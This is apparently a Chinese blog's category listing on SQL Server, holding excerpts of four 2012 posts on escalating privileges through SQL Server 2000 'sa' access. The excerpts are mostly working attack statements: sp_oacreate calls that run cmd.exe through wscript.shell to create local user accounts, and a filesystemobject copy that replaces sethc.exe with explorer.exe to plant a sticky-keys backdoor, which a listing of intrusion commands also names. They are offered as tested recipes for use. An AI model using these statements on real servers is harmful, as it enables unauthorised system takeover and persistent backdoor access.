![](https://img-blog.csdnimg.cn/20201014180756913.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
sql server
地方门户网站系统
这个作者很懒,什么都没留下…
展开
-
sql 2000 提权经测试
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user test test' declare @shell int exec sp_oacreate 'wscript.s原创 2012-03-23 23:29:02 · 1316 阅读 · 0 评论 -
sql 2000 数据库SA提权方法
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user wbj wbj /add' declare @o int exec sp_oacreate 'wscript.原创 2012-03-23 23:33:12 · 1591 阅读 · 0 评论 -
SQL提权语句整理
------------------------------CMD语句--------------------------------------- query user 查看会话 logoff 踢人命令 5下shift后门 系统后门: copy c:\windows\explorer.exe c:\windows\system32\sethc.exe原创 2012-03-23 23:21:34 · 5710 阅读 · 0 评论 -
SQL 2000 SA替换Shift程序
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\WINDOWS\explorer.exe' ,'c:\windows\system32\sethc.exe';原创 2012-03-23 23:42:57 · 633 阅读 · 0 评论